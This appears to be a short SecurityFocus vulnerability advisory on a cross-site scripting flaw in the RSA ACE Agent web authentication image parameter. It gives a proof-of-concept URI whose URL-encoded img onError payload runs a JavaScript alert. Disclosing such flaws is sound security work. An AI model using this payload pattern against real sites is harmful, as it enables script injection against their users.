RSA ACE Agent Image Cross-Site Scripting Vulnerability

No exploit is required.

The following proof-of-concept URI is available:

http://www.example.com/webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript:alert('Thanks%20for%20turning%20on%20the%20remotecontrol')%3b%22%3Exxx


 

Privacy Statement
Copyright 2010, SecurityFocus